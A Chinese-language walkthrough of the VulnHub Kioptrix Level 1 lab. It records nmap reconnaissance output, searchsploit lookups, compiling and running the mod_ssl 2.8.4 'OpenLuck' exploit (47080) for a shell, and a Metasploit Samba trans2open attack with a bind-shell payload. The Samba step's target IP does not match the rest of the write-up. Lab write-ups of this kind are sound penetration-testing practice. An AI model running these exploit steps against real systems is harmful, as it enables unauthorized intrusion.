Kioptrix: Level 1 (#1): 靶机地址
https://www.vulnhub.com/entry/kioptrix-level-1-1
netdiscover -i eth0 -r 192.168.157.0/24
nmap -A -T4 -v 192.168.157.154 -o port.txt
cat port.txt
# Nmap 7.91 scan initiated Mon Nov 15 16:28:34 2021 as: nmap -A -T4 -v -o port.txt 192.168.157.154
Nmap scan report for 192.168.157.154
Host is up (0.00042s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-09-26T09:32:06
| Not valid after: 2010-09-26T09:32:06
| MD5: 78ce 5293 4723 e7fe c28d 74ab 42d7 02f1
|_SHA-1: 9c42 91c3 bed2 a95b 983d 10ac f766 ecb9 8766 1d33
|_ssl-date: 2021-11-15T09:31:29+00:00; +1h01m50s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.010 days (since Mon Nov 15 16:15:22 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=203 (Good luck!)
IP ID Sequence Generation: All zeros
Host script results:
|_clock-skew: 1h01m49s
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KIOPTRIX<00> Flags: <unique><active>
| KIOPTRIX<03> Flags: <unique><active>
| KIOPTRIX<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MYGROUP<00> Flags: <group><active>
| MYGROUP<1d> Flags: <unique><active>
|_ MYGROUP<1e> Flags: <group><active>
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms 192.168.157.154
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 15 16:29:39 2021 -- 1 IP address (1 host up) scanned in 64.55 seconds
整理 发现 开放的端口有
22 SSH 80 HTTP 111 rpcbind 139 netbios-ssn Samba 443 SSL HTTPS
访问 http://192.168.157.154
dirb http://192.168.157.154
之前nmap 扫描出 443端口 版本 为mod_ssl/2.8.4
Exploit-DB是一个漏洞库,Kali Linux中保存了一个该漏洞库的拷贝,利用上面提到的命令就可以查找需要的渗透模块,它将搜索所有的漏洞和shellcode而且该漏洞库是保存在本地的,在没有网络的情况下也可以使用。
用 searchsploit 搜索mod_ssl漏洞
searchsploit mod_ssl
-m 将一个exp拷贝到当前目录, 后边加目标id
searchsploit -m 47080
使用 GCC 命令将有效载荷 c 文件编译为二进制可执行文件并添加执行权限
gcc -o hackNos 47080.c -lcrypto
# 编译有问题的话 自行百度有解决方案 sudo apt-get install libssl-dev
chmod +x hackNos
漏洞现在可以使用了,使用参数 0x6b 缓冲区和我们的目标 IP 地址运行命令
./hackNos 0x6b 192.168.157.154 -c 41
反弹回的shell只是apache用户 并不是 root用户
百度后 得知
有文件在墙外,没有下载和执行成功,如果执行成功拿到的权限是应该root的 。
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
smbclient -L 192.168.157.154 -N
enum4linux -a 192.168.157.154
失败
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.157.154
searchsploit samba
use exploit/linux/samba/trans2open
set PAYLOAD linux/x86/shell_bind_tcp
set rhost 192.168.25.188
run
直接用漏洞提权
1.mod_ssl 2.8.4 溢出漏洞
gcc编译后使用
2.samba 2.2.1a 溢出漏洞
版本探测不出来多试几种方法探测
msf payload 使用场景也要注意